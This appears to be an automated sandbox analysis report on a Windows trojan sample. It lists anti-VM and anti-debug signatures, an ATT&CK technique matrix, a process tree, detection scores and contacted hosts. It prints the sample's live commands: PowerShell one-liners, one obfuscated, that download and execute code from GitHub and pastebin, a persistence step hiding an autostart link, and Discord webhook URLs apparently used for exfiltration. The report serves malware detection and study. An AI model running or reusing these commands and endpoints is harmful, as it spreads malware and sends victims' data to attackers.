Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1772 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2140 Thread sleep count: 1311 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7968 Thread sleep count: 102 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3316 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5956 Thread sleep count: 4747 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3980 Thread sleep count: 5024 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8144 Thread sleep time: -17524406870024063s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4092 Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\Lm9IJ4r9oO.exe Code function: 0_2_0068B063 FindFirstFileExW,0_2_0068B063
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_029DDD60 GetSystemInfo,4_2_029DDD60
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: Amcache.hve.11.dr Binary or memory string: VMware
Source: Amcache.hve.11.dr Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.11.dr Binary or memory string: vmci.syshbin
Source: Amcache.hve.11.dr Binary or memory string: VMware, Inc.
Source: Amcache.hve.11.dr Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.11.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.11.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.11.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Lm9IJ4r9oO.exe, 00000000.00000002.1483428569.00000000012CE000.00000004.00000020.00020000.00000000.sdmp, Lm9IJ4r9oO.exe, 00000000.00000002.1483428569.000000000132E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2109223488.00000204FD342000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: Amcache.hve.11.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.11.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.11.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.11.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: powershell.exe, 00000004.00000002.1835795117.00000000083B0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2227640712.000001D0F66A3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Amcache.hve.11.dr Binary or memory string: vmci.sys
Source: Amcache.hve.11.dr Binary or memory string: vmci.syshbin`
Source: Amcache.hve.11.dr Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.11.dr Binary or memory string: VMware-42 27 9c 31 6b 7d 78 89-be 90 b3 22 a5 ab 1b 52
Source: Amcache.hve.11.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.11.dr Binary or memory string: VMware20,1
Source: Amcache.hve.11.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.11.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.11.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.11.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.11.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.11.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.11.dr Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.11.dr Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.11.dr Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.11.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.11.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\Lm9IJ4r9oO.exe Process queried: DebugPort
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 18_2_00007FFB1137E152 rdtsc 18_2_00007FFB1137E152
Source: C:\Users\user\Desktop\Lm9IJ4r9oO.exe Code function: 0_2_0067E9F7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0067E9F7
Source: C:\Users\user\Desktop\Lm9IJ4r9oO.exe Code function: 0_2_0068E436 GetProcessHeap,0_2_0068E436
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\Lm9IJ4r9oO.exe Code function: 0_2_0067E9F7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0067E9F7
Source: C:\Users\user\Desktop\Lm9IJ4r9oO.exe Code function: 0_2_00678B08 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00678B08
Source: C:\Users\user\Desktop\Lm9IJ4r9oO.exe Code function: 0_2_00678E10 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00678E10
Source: C:\Users\user\Desktop\Lm9IJ4r9oO.exe Code function: 0_2_00678F9D SetUnhandledExceptionFilter,0_2_00678F9D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex(iwr https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm_menu.txt -usebasicparsing)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ztufso2n\ztufso2n.cmdline"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\attrib.exe "C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESBF7B.tmp" "c:\Users\user\AppData\Local\Temp\ztufso2n\CSC92EFC5D82192472686D16339634A9CDA.TMP"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: C:\Users\user\Desktop\Lm9IJ4r9oO.exe Code function: 0_2_0067888C cpuid 0_2_0067888C
Source: C:\Users\user\Desktop\Lm9IJ4r9oO.exe Code function: GetACP,IsValidCodePage,GetLocaleInfoW,0_2_0068D864
Source: C:\Users\user\Desktop\Lm9IJ4r9oO.exe Code function: GetLocaleInfoW,0_2_0068E103
Source: C:\Users\user\Desktop\Lm9IJ4r9oO.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_0068E1D9
Source: C:\Users\user\Desktop\Lm9IJ4r9oO.exe Code function: EnumSystemLocalesW,0_2_00686AB1
Source: C:\Users\user\Desktop\Lm9IJ4r9oO.exe Code function: EnumSystemLocalesW,0_2_0068DB5B
Source: C:\Users\user\Desktop\Lm9IJ4r9oO.exe Code function: EnumSystemLocalesW,0_2_0068DB10
Source: C:\Users\user\Desktop\Lm9IJ4r9oO.exe Code function: EnumSystemLocalesW,0_2_0068DBF6
Source: C:\Users\user\Desktop\Lm9IJ4r9oO.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_0068DC81
Source: C:\Users\user\Desktop\Lm9IJ4r9oO.exe Code function: GetLocaleInfoW,0_2_0068DED4
Source: C:\Users\user\Desktop\Lm9IJ4r9oO.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_0068DFFD
Source: C:\Users\user\Desktop\Lm9IJ4r9oO.exe Code function: GetLocaleInfoW,0_2_00686F80
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Xml\v4.0_4.0.0.0__b77a5c561934e089\System.XML.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft OneDrive\FileSync VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Xml\v4.0_4.0.0.0__b77a5c561934e089\System.XML.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\Desktop\Lm9IJ4r9oO.exeCode function: 0_2_00678D0A GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00678D0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: Amcache.hve.11.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.11.drBinary or memory string: msmpeng.exe
Source: Amcache.hve.11.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.11.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.11.drBinary or memory string: MsMpEng.exe
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts111
Windows Management Instrumentation
11
Registry Run Keys / Startup Folder
11
Process Injection
1
Masquerading
OS Credential Dumping1
System Time Discovery
Remote Services1
Archive Collected Data
1
Web Service
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts2
Command and Scripting Interpreter
1
DLL Side-Loading
11
Registry Run Keys / Startup Folder
141
Virtualization/Sandbox Evasion
LSASS Memory161
Security Software Discovery
Remote Desktop ProtocolData from Removable Media11
Encrypted Channel
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts2
PowerShell
Logon Script (Windows)1
DLL Side-Loading
11
Process Injection
Security Account Manager1
Process Discovery
SMB/Windows Admin SharesData from Network Shared Drive4
Ingress Tool Transfer
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Deobfuscate/Decode Files or Information
NTDS141
Virtualization/Sandbox Evasion
Distributed Component Object ModelInput Capture4
Non-Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
Obfuscated Files or Information
LSA Secrets1
Application Window Discovery
SSHKeylogging15
Application Layer Protocol
Scheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading
Cached Domain Credentials2
File and Directory Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync35
System Information Discovery
Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Behavior Graph ID: 1534109 | Sample: Lm9IJ4r9oO.exe | Startdate: 15/10/2024 | Architecture: WINDOWS | Score: 100

Contacted domains/IPs: pastebin.com, raw.githubusercontent.com, 2 other IPs or domains
Signatures on the sample: Suricata IDS alerts for network traffic; Malicious sample detected (through community Yara rule); Antivirus / Scanner detection for submitted sample; 7 other signatures
Signature on pastebin.com: Connects to a pastebin service (likely for C&C)

Process tree (from the behavior graph):
  • Lm9IJ4r9oO.exe (started); signature: Suspicious powershell command line found
    • powershell.exe (started); signature: Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
      • powershell.exe (started); connects to raw.githubusercontent.com 185.199.111.133, 443, 49710, 49711 FASTLYUS Netherlands and discord.com 162.159.138.232, 443, 62862, 62871 CLOUDFLARENETUS United States; dropped C:\Users\user\AppData\...\ztufso2n.cmdline (Unicode) and C:\ProgramData\...\BeginSync.lnk (MS); signature: Tries to open files direct via NTFS file id
        • csc.exe (started); dropped C:\Users\user\AppData\Local\...\ztufso2n.dll (PE32)
          • cvtres.exe (started)
        • conhost.exe (started)
        • attrib.exe (started)
      • conhost.exe (started)
    • WerFault.exe (started); dropped C:\ProgramData\Microsoft\...\Report.wer (Unicode)
  • forfiles.exe (started)
    • powershell.exe (started); signatures: Suspicious powershell command line found; Powershell creates an autostart link
      • powershell.exe (started); connects to pastebin.com 104.20.3.235, 443, 62863, 62864 CLOUDFLARENETUS United States and 185.199.110.133, 443, 62865, 62866 FASTLYUS Netherlands
    • conhost.exe (started)
  • forfiles.exe (started)
    • powershell.exe (started)
      • powershell.exe (started)
    • conhost.exe (started)

Source | Detection | Scanner | Label | Link
Lm9IJ4r9oO.exe | 42% | ReversingLabs | Win32.Trojan.Generic |
Lm9IJ4r9oO.exe | 100% | Avira | HEUR/AGEN.1317649 |
Lm9IJ4r9oO.exe | 100% | Joe Sandbox ML | |
No Antivirus matches
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label | Link
http://nuget.org/NuGet.exe | 0% | URL Reputation | safe |
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe |
https://go.micro | 0% | URL Reputation | safe |
https://contoso.com/License | 0% | URL Reputation | safe |
https://contoso.com/Icon | 0% | URL Reputation | safe |
http://upx.sf.net | 0% | URL Reputation | safe |
https://aka.ms/pscore6 | 0% | URL Reputation | safe |
https://contoso.com/ | 0% | URL Reputation | safe |
https://nuget.org/nuget.exe | 0% | URL Reputation | safe |
https://aka.ms/pscore68 | 0% | URL Reputation | safe |
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
discord.com | 162.159.138.232 | true | true | | unknown
raw.githubusercontent.com | 185.199.111.133 | true | true | | unknown
pastebin.com | 104.20.3.235 | true | true | | unknown
198.187.3.20.in-addr.arpa | unknown | unknown | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
https://discord.com/api/webhooks/1284710807871033355/x0K3Voa94DlgTs4VQWHyks9bUB8i5Uipo6HRW6lKUeKFJpTODgkBqgFx7seLHmsLq996 | true | | unknown
https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm_menu.txt | true | | unknown
https://raw.githubusercontent.com/labail300/psapi/main/modmenu.txt | false | | unknown
http://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt | false | | unknown
https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt | false | | unknown
http://pastebin.com/raw/sA04Mwk2 | false | | unknown
https://pastebin.com/raw/sA04Mwk2 | false | | unknown
https://discord.com/api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2 | true | | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://raw.githubusercontent.com/labail300/psapi/main/modmenu.txt99u | Lm9IJ4r9oO.exe, 00000000.00000002.1483428569.00000000012CE000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://www.microsoft.coE | powershell.exe, 00000018.00000002.2227532640.000001D0F64B0000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://nuget.org/NuGet.exe | powershell.exe, 00000004.00000002.1818087157.0000000005463000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2104984117.00000204F4551000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2220062700.000001D0EE391000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://discord.com | powershell.exe, 00000004.00000002.1812665851.0000000004645000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2072699759.00000204E5302000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2138446158.000001D0DF153000.00000004.00000800.00020000.00000000.sdmp | true | | unknown
https://raw.githubusercontent.com/labail300/psapi/main/modmenu.txtg | Lm9IJ4r9oO.exe, 00000000.00000003.1418176354.0000000001344000.00000004.00000020.00020000.00000000.sdmp, Lm9IJ4r9oO.exe, 00000000.00000003.1418283397.0000000001344000.00000004.00000020.00020000.00000000.sdmp, Lm9IJ4r9oO.exe, 00000000.00000002.1483561322.0000000001344000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://discord.com/api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_ | powershell.exe, 00000018.00000002.2138446158.000001D0DE7D5000.00000004.00000800.00020000.00000000.sdmp | true | | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000018.00000002.2138446158.000001D0DE53B000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://discord.com/api/webhooks/1285453590428782614/2ICVsBAPEUQ | powershell.exe, 00000012.00000002.2072699759.00000204E4995000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2138446158.000001D0DE7D5000.00000004.00000800.00020000.00000000.sdmp | true | | unknown
https://raw.githubusercontent.com/labail300/psapi/main/modmenu.txt05 | Lm9IJ4r9oO.exe, 00000000.00000002.1483428569.00000000012CE000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000018.00000002.2138446158.000001D0DE53B000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
